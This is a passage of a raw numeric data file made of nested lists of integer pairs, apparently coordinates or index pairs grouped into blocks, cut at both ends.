25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 22],[ 10 , 25],[ 10 , 28],[ 10 , 29],[ 10 , 31],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 10 , 38],[ 10 , 40],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 
37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 
19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 17],[ 6 , 18],[ 6 , 19],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 16],[ 8 , 20],[ 8 , 21],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 17],[ 11 , 20],[ 11 , 23],[ 11 , 24],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 12 , 17],[ 12 , 20],[ 12 , 23],[ 12 , 24],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 
21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 22],[ 11 , 26],[ 11 , 27],[ 11 , 28],[ 11 , 32],[ 11 , 33],[ 11 , 34],[ 11 , 38],[ 11 , 39],[ 11 , 40],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 
40],[ 21 , 41]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 
